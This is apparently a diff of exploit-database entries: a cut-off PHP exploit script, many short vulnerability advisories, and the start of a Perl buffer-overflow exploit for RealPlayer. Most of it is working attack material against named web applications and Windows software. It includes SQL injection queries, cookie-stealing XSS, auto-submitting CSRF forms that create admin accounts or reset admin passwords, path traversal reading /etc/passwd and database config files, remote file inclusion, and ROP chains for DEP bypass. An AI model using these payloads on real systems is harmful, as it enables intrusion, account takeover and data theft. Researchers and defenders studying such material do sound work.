$path.'index.php?n=modules/panel&a=2&tmp[authorization]=4';
$packet3 = "POST
$Query3&editpassword=&editpassword2=&editemail=$RandMail&edittemplate=default&editurl=&editflag=none&editday=0&editmonth=0&edityear=0&edithideemail=0&editcalendarbday=0&editmsn=&edityahoo=&editicq=&editaim=&editskype=&editsignature=&editaboutme=&PHPSESSID=$PHPSESSID
HTTP/1.1\r\n";
$packet3 .= "User-Agent: Shareaza v1.x.x.xx\r\n";
$packet3 .= "Host: ".$host."\r\n";
$packet3 .= "Connection: Close\r\n\r\n";
sendpacket($packet3);
if(stristr($html , 'i=26') == false)
{
die('Exploit Failed');
}
$Query4 = $path.'index.php?n=modules/login&a=1';
$packet4 = "POST $Query4&PHPSESSID=$PHPSESSID HTTP/1.1\r\n";
$packet4 .= "User-Agent: Shareaza v1.x.x.xx\r\n";
$packet4 .= "Host: ".$host."\r\n";
$packet4 .= "Connection: Close\r\n\r\n";
sendpacket($packet4);
die('Exploit succeeded! You have Full access now!');
}
?>

12
platforms/php/webapps/30892.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/26896/info
Neuron News is prone to multiple input-validation vulnerabilities, including an SQL-injection issue and two cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect Neuron News 1.0; other versions may also be affected.
http://www.example.com/patch/?q=&#039;/**/union/**/select/**/1,2,adminmail,4,id/**/from/**/neuronnews_configuration/*
http://www.example.com/patch/?q=viewtopic&topic=<script>alert(111111)</script>
http://www.example.com/patch/?q=newsarchive&newsyear=<script>alert(111111)</script>
http://www.example.com/patch/?q=newsarchive&newsyear=<script>alert(111111)</script>&newsmonth=<script>alert(111111)</script>

19
platforms/php/webapps/30893.txt Executable file
View file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/26898/info
PHP Security Framework is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues and remote file-include issues.
A successful exploit may allow an attacker to execute malicious code within the context of the webserver process, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHP Security Framework Beta 1 is vulnerable; other versions may also be affected.
http://www.example.com/PSF/lib/base.inc.php?MODEL_DIR=http://www.example2.com/
http://www.example.com/PSF/lib/base.inc.php?DAO_DIR=/etc/passwd%00
POST http://www.example.com/PSF/index.php?page=authentification HTTP/1.1\r\n
Host: localhost\r\n
Connection: keep-alive\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: <SIZE>\r\n\r\n
username=8%27+union+select+CHR%2856%29%2CCHR%2857%29%2CCHR%2857%29%2CCHR%2857%29+FROM+psf_administrator-----------&password=9&page=authentification&button=Log+in\r\n\r\n
SQL-query: select * from psf_administrator WHERE username='8\\\\\\\\\\\\\\\'union select CHR(56),CHR(57),CHR(57),CHR(57) FROM psf_administrator-----------'

9
platforms/php/webapps/30899.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26922/info
Mambo is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Mambo 4.6.2 is vulnerable; other versions may also be affected.
http://localhost/mambo/http://localhost/index.php?option=com_frontpage&Itemid=>"><script>alert("XSS%20Successful")</script> http://localhost/index.php?option=>"><script>alert("XSS%20Successful")</script>&Itemid=1

36
platforms/php/webapps/30909.html Executable file
View file

@ -0,0 +1,36 @@
Auto Classifieds Script v2.0 - CSRF Vulnerabilty [Add Admin]
====================================================================
####################################################################
.:. Author : HackXBack
.:. Contact : h-b@usa.com
.:. Home : http://www.iphobos.com/blog/
.:. Script :
http://www.phpjabbers.com/preview/auto-classifieds-script/
####################################################################
===[ Exploit ]===
Cross Site Request Forgery
===========================
[Add Admin]
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://www.site.com/index.php?controller=AdminUsers&action=create">
<input type="hidden" name="user_create" value="1"/>
<input type="hidden" name="Full_name" value="Iphobos"/>
<input type="hidden" name="username" value="Admin"/>
<input type="hidden" name="password" value="password"/>
<input type="hidden" name="status" value="T"/>
<input type="hidden" name="role_id" value="1"/>
</form>
</body>
</html>
####################################################################

83
platforms/php/webapps/30910.txt Executable file
View file

@ -0,0 +1,83 @@
Job Listing Script - Multiple Vulnerabilties
====================================================================
####################################################################
.:. Author : HackXBack
.:. Contact : h-b@usa.com
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://www.phpjabbers.com/preview/job-listing-script/
####################################################################
===[ Exploit ]===
[1] Cross Site Request Forgery
==============================
[Change Username/Password Admin]
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://site/index.php?controller=AdminOptions&action=update">
<input type="hidden" name="options_update" value="1"/>
<input type="hidden" name="username" value="admin"/>
<input type="hidden" name="password" value="password"/>
<input type="hidden" name="value-enum-9" value="Yes|No::Yes"/>
<input type="hidden" name="value-enum-8" value="Yes|No::Yes"/>
<input type="hidden" name="value-enum-7"
value="d.m.Y|m.d.Y|Y.m.d|j.n.Y|n.j.Y|Y.n.j|d/m/Y|m/d/Y|Y/m/d|j/n/Y|n/j/Y|Y/n/j|d-m-Y|m-d-Y|Y-m-d|j-n-Y|n-j-Y|Y-n-j::d.m.Y"/>
<input type="hidden" name="value-enum-6" value="Yes|No::Yes"/>
<input type="hidden" name="value-int-5" value="5"/>
<input type="hidden" name="value-string-4" value="http://www.example.com"/>
<input type="hidden" name="value-enum-3" value="Yes|No::Yes"/>
<input type="hidden" name="value-string-2" value="email@domain.com"/>
<input type="hidden" name="value-int-1" value="10"/>
</form>
</body>
</html>
[2] Multiple Cross Site Scripting
==================================
# CSRF with XSS Exploit:
I. Xss In Categories
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://site/index.php?controller=AdminCategories&action=create">
<input type="hidden" name="category_create" value="Iphobos Blog"/>
<input type="hidden" name="category_title"
value="<script>alert(document.cookie);</script>"/>
</form>
</body>
</html>
II. Xss In Type
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://site/index.php?controller=AdminTypes&action=create">
<input type="hidden" name="type_create" value="Iphobos Blog"/>
<input type="hidden" name="type_title"
value="<script>alert(document.cookie);</script>"/>
</form>
</body>
</html>
III. Xss In Country
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://site/index.php?controller=AdminCountries&action=create">
<input type="hidden" name="country_create" value="Iphobos Blog"/>
<input type="hidden" name="country_title"
value="<script>alert(document.cookie);</script>"/>
</form>
</body>
</html>
####################################################################

64
platforms/php/webapps/30911.txt Executable file
View file

@ -0,0 +1,64 @@
Appointment Scheduler V2.0 - Multiple Vulnerabilities
=========================================================================
####################################################################
.:. Author : HackXBack
.:. Contact : h-b@usa.com
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://www.phpjabbers.com/appointment-scheduler/
####################################################################
===[ Exploit ]===
[1] Cross Site Scripting
=========================
# CSRF with XSS Exploit:
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://site/index.php?controller=pjAdminServices&action=pjActionCreate">
<input type="hidden" name="service_create" value="1"/>
<input type="hidden" name="i18n[1][name]"
value="<script>alert(document.cookie);</script>"/>
<input type="hidden" name="i18n[1][description]" value="Iphobos Blog"/>
<input type="hidden" name="price" value="100"/>
<input type="hidden" name="length" value="1"/>
<input type="hidden" name="before" value="1"/>
<input type="hidden" name="after" value="1"/>
<input type="hidden" name="total" value="3"/>
<input type="hidden" name="is_active" value="1"/>
</form>
</body>
</html>
[2] Cross Site Request Forgery
===============================
[Add Admin]
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://site/index.php?controller=pjAdminUsers&action=pjActionCreate">
<input type="hidden" name="user_create" value="1"/>
<input type="hidden" name="role_id" value="1"/>
<input type="hidden" name="email" value="Email@hotmail.com"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="name" value="Iphobos"/>
<input type="hidden" name="status" value="T"/>
</form>
</body>
</html
[3] Local File disclure
========================
http://site/index.php?controller=pjBackup&action=pjActionDownload&id=../../../../../app/config/db.inc.php
http://site/index.php?controller=pjBackup&action=pjActionDownload&id=../../../../../../../../etc/passwd
####################################################################

79
platforms/php/webapps/30912.txt Executable file
View file

@ -0,0 +1,79 @@
Car Rental Script - Multiple Vulnerabilities
====================================================================
####################################################################
.:. Author : HackXBack
.:. Contact : h-b@usa.com
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://www.phpjabbers.com/car-rental/
.:. Tested On Demo :
http://www.phpjabbers.com/demo/cr_11/index.php?controller=Admin&action=login
####################################################################
===[ Exploit ]===
[1] Multiple Cross Site Scripting
=================================
I. Persistent XSS
# CSRF with XSS Exploit:
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://SITE/index.php?controller=AdminExtras&action=create">
<input type="hidden" name="extra_create" value="1"/>
<input type="hidden" name="i18n[1][name]"
value="<script>alert(document.cookie);</script>"/>
<input type="hidden" name="i18n[2][name]" value=""/>
<input type="hidden" name="i18n[3][name]" value=""/>
<input type="hidden" name="price" value="1000$"/>
<input type="hidden" name="per" value="booking"/>
<input type="hidden" name="count" value="1000$"/>
</form>
</body>
</html>
II. Non-Persistent XSS
www.site.com/index.php?controller=AdminBookings&action=index&p_date=XSS
www.site.com/index.php?controller=AdminBookings&action=index&p_date=
"><script>alert(document.cookie);</script>"/>
[2] Cross Site Request Forgery
===============================
[Change Username/Password Admin]
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://site/index.php?controller=AdminOptions&action=update">
<input type="hidden" name="options_update" value="1"/>
<input type="hidden" name="tab" value="1"/>
<input type="hidden" name="username" value="admin"/>
<input type="hidden" name="password" value="password"/>
<input type="hidden" name="value-enum-currency" value="USD|GBP|EUR::USD"/>
<input type="hidden" name="value-enum-date_format"
value="d.m.Y|m.d.Y|Y.m.d|j.n.Y|n.j.Y|Y.n.j|d/m/Y|m/d/Y|Y/m/d|j/n/Y|n/j/Y|Y/n/j|d-m-Y|m-d-Y|Y-m-d|j-n-Y|n-j-Y|Y-n-j::j/n/Y"/>
<input type="hidden" name="value-enum-datetime_format" value="d.m.Y,
H:i|d.m.Y, H:i:s|m.d.Y, H:i|m.d.Y, H:i:s|Y.m.d, H:i|Y.m.d, H:i:s|j.n.Y,
H:i|j.n.Y, H:i:s|n.j.Y, H:i|n.j.Y, H:i:s|Y.n.j, H:i|Y.n.j, H:i:s|d/m/Y,
H:i|d/m/Y, H:i:s|m/d/Y, H:i|m/d/Y, H:i:s|Y/m/d, H:i|Y/m/d, H:i:s|j/n/Y,
H:i|j/n/Y, H:i:s|n/j/Y, H:i|n/j/Y, H:i:s|Y/n/j, H:i|Y/n/j, H:i:s|d-m-Y,
H:i|d-m-Y, H:i:s|m-d-Y, H:i|m-d-Y, H:i:s|Y-m-d, H:i|Y-m-d, H:i:s|j-n-Y,
H:i|j-n-Y, H:i:s|n-j-Y, H:i|n-j-Y, H:i:s|Y-n-j, H:i|Y-n-j, H:i:s::j/n/Y,
H:i"/>
<input type="hidden" name="value-enum-timezone"
value="-43200|-39600|-36000|-32400|-28800|-25200|-21600|-18000|-14400|-10800|-7200|-3600|0|3600|7200|10800|14400|18000|21600|25200|28800|32400|36000|39600|43200|46800::0"/>
</form>
</body>
</html>
####################################################################

93
platforms/php/webapps/30913.txt Executable file
View file

@ -0,0 +1,93 @@
Event Booking Calendar V2.0 - Multiple Vulnerabilities
====================================================================
####################################################################
.:. Author : HackXBack
.:. Contact : h-b@usa.com
.:. Home : http://www.iphobos.com/blog/
.:. Script : www.phpjabbers.com/event-booking-calendar/
.:. Dork : inurl:"load-calendar.php"
####################################################################
===[ Exploit ]===
[1] multiple Blind Ijection
============================
www.site.com/script/load-calendar.php?view=1&month=6&year=2013&cid=1[inject]
www.site.com/script/load-calendar.php?cid=1[inject]
www.site.com/script/load-calendar.php?view=1&month=6&year=2013&cid=1+and+1=1
>>True
www.site.com/script/load-calendar.php?view=1&month=6&year=2013&cid=1+and+1=2
>>False
www.site.com/script/load-calendar.php?view=1&month=6&year=2013&cid=1+and+substring(@@version,1,1)=5
>>True
www.site.com/script/load-calendar.php?view=1&month=6&year=2013&cid=1+and+substring(@@version,1,1)=4
>>False
[2] Cross Site Request Forgery
==============================
[Change Username/Password Admin]
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://site/index.php?controller=AdminOptions&action=update">
<input type="hidden" name="options_update" value="1"/>
<input type="hidden" name="tab_id" value="tabs-1"/>
<input type="hidden" name="username" value="admin"/>
<input type="hidden" name="password" value="password"/>
</form>
</body>
</html>
[3] Multiple Cross Site Scripting
=================================
# CSRF with XSS Exploit:
I. Xss In Event
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://site/index.php?controller=AdminEvents&action=create">
<input type="hidden" name="event_create" value="1"/>
<input type="hidden" name="category_id" value="2"/>
<input type="hidden" name="event_title"
value="<script>alert(document.cookie);</script>"/>
<input type="hidden" name="event_description" value="12"/>
<input type="hidden" name="event_max_people" value="12"/>
<input type="hidden" name="event_color" value="FFCC00"/>
<input type="hidden" name="start[1]" value="2014-01-11 00:00"/>
<input type="hidden" name="end[1]" value="2014-01-11 00:00"/>
<input type="hidden" name="title[]" value="Regular price"/>
<input type="hidden" name="price[]" value="888"/>
<input type="hidden" name="repeat_every" value=""/>
<input type="hidden" name="repeat_ends" value="2014-01-11"/>
</form>
</body>
</html>
II. Xss In Categories
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://site/index.php?controller=AdminCategories&action=create">
<input type="hidden" name="category_create" value="1"/>
<input type="hidden" name="category_title"
value="<script>alert(document.cookie);</script>"/>
</form>
</body>
</html>
####################################################################

59
platforms/php/webapps/30916.txt Executable file
View file

@ -0,0 +1,59 @@
Advisory ID: HTB23192
Product: Burden
Vendor: Josh Fradley
Vulnerable Version(s): 1.8 and probably prior
Tested Version: 1.8
Advisory Publication: December 18, 2013 [without technical details]
Vendor Notification: December 18, 2013
Vendor Patch: December 18, 2013
Public Disclosure: January 8, 2014
Vulnerability Type: Improper Authentication [CWE-287]
CVE Reference: CVE-2013-7137
Risk Level: High
CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered vulnerability in application authentication mechanism in Burden, which can be exploited by remote non-authenticated attacker to gain administrative access to the vulnerable application.
1) Improper Authentication in Burden: CVE-2013-7137
The vulnerability exists due to insufficient authentication when handling "burden_user_rememberme" cookie parameter. A remote unauthenticated user can set "burden_user_rememberme" cookie to "1" and gain administrative access to the application.
The exploitation example below shows HTTP GET request that grants administrative privileges to the user:
GET /login.php HTTP/1.1
Cookie: burden_user_rememberme=1;
The cookie can be also changed using a browser plugin such as Firebug for FireFox.
-----------------------------------------------------------------------------------------------
Solution:
Update to Burden 1.8.1
More Information:
https://github.com/joshf/Burden/releases/tag/1.8.1
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23192 - https://www.htbridge.com/advisory/HTB23192 - Improper Authentication in Burden.
[2] Burden - https://github.com/joshf - Burden is a full featured task management app written in PHP.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

62
platforms/php/webapps/30917.txt Executable file
View file

@ -0,0 +1,62 @@
Advisory ID: HTB23191
Product: Horizon QCMS
Vendor: Horizon QCMS
Vulnerable Version(s): 4.0 and probably prior
Tested Version: 4.0
Advisory Publication: December 18, 2013 [without technical details]
Vendor Notification: December 18, 2013
Vendor Patch: December 25, 2013
Public Disclosure: January 8, 2014
Vulnerability Type: Path Traversal [CWE-22], SQL Injection [CWE-89]
CVE References: CVE-2013-7138, CVE-2013-7139
Risk Level: High
CVSSv2 Base Scores: 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N), 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Horizon QCMS, which can be exploited to read contents of arbitrary files and perform SQL Injection attacks.
1) Path Traversal in Horizon QCMS: CVE-2013-7138
The vulnerability exists due to insufficient filtration of "start" HTTP GET parameter passed to "/lib/functions/d-load.php" script before using it in PHP "fopen()" function. A remote attacker can read contents of arbitrary files on the target system with privileges of the web server.
The exploitation example below will display content of "/config.php" file that contains MySQL database login credentials:
http://[host]/lib/functions/d-load.php?start=../../config.php
2) SQL Injection in Horizon QCMS: CVE-2013-7139
The vulnerability exists due to insufficient validation of "category" HTTP POST parameter passed to "/download.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.
The exploitation example below displays version of MySQL server:
http://[host]/download.php?category=%27%20union%20select%201,2,version(),4,5,6%20--%202
-----------------------------------------------------------------------------------------------
Solution:
Apply security patch for Horizon 4.0
More Information:
http://sourceforge.net/projects/hnqcms/files/patches/
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23191 - https://www.htbridge.com/advisory/HTB23191 - Multiple vulnerabilities in Horizon QCMS.
[2] Horizon QCMS - http://www.hnqcms.com/ - An open source Horizon Quick Content Managment System with PHP and MySQL support.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

12
platforms/php/webapps/30918.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/26961/info
iSupport is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
Exploiting this issue may allow an unauthorized user to view files and execute local scripts.
This issue affects iSupport 1.8; other versions may also be affected.
http://www.example.com/iSupport/index.php?include_file=[local file]
http://www.example.com/helpdesk/index.php?include_file=../../../../../proc/self/environ
http://www.example.com/helpdesk/index.php?include_file=../../../../../etc/passwd

9
platforms/php/webapps/30921.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26977/info
MRBS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue was previously documented as a vulnerability in Moodle. Further reports indicate this issue affects MRBS, and the MRBS module for Moodle.
http://www.example.com/PATH/moodle/ing/blocks/mrbs/code/web/view_entry.php?id=2000%20UNION%20SELECT%20username,id,id,id,id,id,id,id,id,id,id,id%20FROM%20mdl_user%20WHERE%20id=[ID]&day=27&month=10&year=2007

7
platforms/php/webapps/30923.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/26987/info
MyBlog is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/[path]/games.php?id=[Sh3ll-Script]

9
platforms/php/webapps/30924.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26992/info
Dokeos is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
These issues affect Dokeos 1.8.4 and earlier versions.
http://www.example.com/main/forum/viewthread.php?forum=XSS

9
platforms/php/webapps/30925.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26992/info
Dokeos is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
These issues affect Dokeos 1.8.4 and earlier versions.
http://www.example.com/main/forum/viewforum.php?cidReq=[Forum-ID]&forum=XSS

10
platforms/php/webapps/30926.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/26992/info
Dokeos is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
These issues affect Dokeos 1.8.4 and earlier versions.
http://www.example.com/main/work/work.php?cidReq=[Forum-ID]&curdirpath=/&display_upload_form=true&origin=XSS

11
platforms/php/webapps/30927.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/26998/info
ThemeSiteScript is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
ThemeSiteScript 1.0 is reported vulnerable; other versions may be affected as well.
http://www.example.com/admin/index.php?loadadminpage=http://www.example2.com

7
platforms/php/webapps/30929.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/27003/info
Logaholic is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues, a cross-site scripting issue, and an HTML-injection issue. The issues occur because the application fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/logaholic/update.php?conf=nameofprofile&page=SQL INjection

7
platforms/php/webapps/30930.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/27003/info
Logaholic is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues, a cross-site scripting issue, and an HTML-injection issue. The issues occur because the application fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/logaholic/index.php?conf=nameofprofile&from=SQL INJECTION

7
platforms/php/webapps/30931.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/27003/info
Logaholic is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues, a cross-site scripting issue, and an HTML-injection issue. The issues occur because the application fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?conf=<img+src=http://testingsite.com/yep.gif+onload=alert(812051443)>

8
platforms/php/webapps/30932.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/27003/info
Logaholic is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues, a cross-site scripting issue, and an HTML-injection issue. The issues occur because the application fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
POST variable "newconfname" in profiles.php?conf=nameofprofile to
>"><ScRiPt%20%0a%0d>alert(xss)%3B</ScRiPt> in /logaholic/profiles.php

9
platforms/php/webapps/30937.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27027/info
Limbo CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Limbo CMS 1.0.4.2 is vulnerable; other versions may also be affected.
http://www.example.com/admin.php?com_option=>"'><SCRIPT>a=/XSS/;alert(a.source)</SCRIPT>

13
platforms/windows/dos/30773.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/26468/info
Microsoft Jet Database Engine is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data.
Remote attackers can exploit this issue to execute arbitrary machine code in the context of a user running the application. Successful exploits will compromise the affected application and possibly the underlying computer. Failed attacks will likely cause denial-of-service conditions.
NOTE: Further details report that attackers are using malicious Word files to load specially crafted MDB files. Microsoft has released a knowledge base article (950627) documenting this attack vector.
This issue does not affect Windows Server 2003 Service Pack 2, Windows XP Service Pack 3, Windows XP x64 edition Server Pack 2, Windows Vista, Windows Vista Service Pack 1 and Windows Server 2008 because they run a version of the Jet Database Engine that isn't vulnerable.
This issue does affect the Jet Database Engine, Microsoft Word 2000 Service Pack 3, Microsoft Word 2002 Service Pack 3, Microsoft Word 2003 Service Pack 2, Microsoft Word 2003 Service Pack 3, Microsoft Word 2007, and Microsoft Word 2007 Service Pack 1 on Microsoft Windows 2000, Windows XP, or Windows Server 2003 Service Pack 1.
http://www.exploit-db.com/sploits/30773.mdb

40
platforms/windows/dos/30936.html Executable file
View file

@ -0,0 +1,40 @@
source: http://www.securityfocus.com/bid/27026/info
AOL Picture Editor 'YGPPicEdit.dll' ActiveX control is prone to multiple vulnerabilities that attackers can exploit to crash the application. The issues stem from various buffer-overflow conditions.
An attacker can exploit these issues by enticing an unsuspecting victim to visit a malicious HTML page.
Successfully exploiting these issues may allow remote attackers to crash the affected application using the ActiveX control (typically Internet Explorer), denying service to legitimate users. Reports indicate that this issue may not be exploited to execute arbitrary code.
AOL Picture Editor 'YGPPicEdit.dll' 9.5.1.8 is vulnerable; other versions may also be affected.
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var s = &#039;A&#039;;
while (s.length <= 8175) s = s + &#039;A&#039;;
obj.DisplayName = s;
obj.DisplayName = s;
obj.FinalSavePath = s;
obj.ForceSaveTo = s;
obj.HiddenControls = s;
obj.InitialEditorScreen = s;
obj.Locale = s;
obj.Proxy = s;
obj.UserAgent = s;
}
</script>
</head>
<body onload="JavaScript: return Check();">
<object id="obj" classid="clsid:085891E5-ED86-425F-8522-C10290FA8309">
</object>
</body>
</html>

50
platforms/windows/local/30468.pl
View file

@ -1,14 +1,14 @@
?#!/usr/bin/perl
#!/usr/bin/perl
#-----------------------------------------------------------------------------#
# Exploit Title: RealNetworks RealPlayer Version Attribute Buffer Overflow #
# Date: Dec 20, 2013 #
# Date: Dec 20 2013 #
# Exploit Author: Gabor Seljan #
# Vendor Homepage: http://www.real.com #
# Software Link: http://www.oldapps.com/real.php?old_real_player=12814 #
# Version: 16.0.3.51 and 16.0.2.32 #
# Tested on: Windows XP SP2/SP3 (NX) #
# CVE: CVE-2013-6877 #
# Version: 16.0.3.51, 16.0.2.32 #
# Tested on: Windows XP SP2/SP3 (DEP Bypass) #
# CVE: CVE-2013-7260 #
#-----------------------------------------------------------------------------#
use strict;
@ -16,14 +16,34 @@ use warnings;
my $filename = "sploit.rmp";
my $open = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22";
my $close = "\x22\x3f\x3e\x3b";
my $junk1 = "\x41" x 2540; # Offset to SEH when opening via click
my $junk2 = "\x41" x 10514; # Offset to SEH when opening via menu
my $junk1 = "\x41" x 44; # Offset to ROP + Shellcode
my $junk2 = "\x43" x 1858; # Offset to SEH when opening via click (2540)
my $junk3 = "\x44" x 11052; # Offset to SEH when opening via menu (13600)
my $nSEH = "\xeb\x06\x90\x90"; # Overwrite next SEH with JMP (6 bytes)
my $SEH = pack('V',0x641930c8); # POP POP RET from rpap3260.dll (16.0.3.51)
#my $SEH = pack('V',0x63A630B8); # POP POP RET from rpap3260.dll (16.0.2.32)
my $junk3 = "\x41" x 17000; # Generate exception
my $SEH = pack('V',0x5acceecd); # ADD ESP,428 # RETN 10 [mswmdm.dll]
my $junk4 = "\x45" x 17000; # Generate exception
my $rop_gadgets = "";
$rop_gadgets .= pack('V',0x77c1c552); # RETN (ROP NOP) [msvcrt.dll]
$rop_gadgets .= "\x42" x 16; # JUNK
$rop_gadgets .= pack('V',0x77c21d16); # POP EAX # RETN [msvcrt.dll]
$rop_gadgets .= pack('V',0x77c11120); # &VirtualProtect() [IAT msvcrt.dll]
$rop_gadgets .= pack('V',0x77c1bb36); # POP EBP # RETN [msvcrt.dll]
$rop_gadgets .= pack('V',0x77c20497); # skip 4 bytes [msvcrt.dll]
$rop_gadgets .= pack('V',0x77c2362c); # POP EBX # RETN [msvcrt.dll]
$rop_gadgets .= pack('V',0x0000095c); # 0x0000095C-> EBX
$rop_gadgets .= pack('V',0x77c4cb29); # POP EDX # RETN [msvcrt.dll]
$rop_gadgets .= pack('V',0x00000040); # 0x00000040-> EDX
$rop_gadgets .= pack('V',0x77c1f519); # POP ECX # RETN [msvcrt.dll]
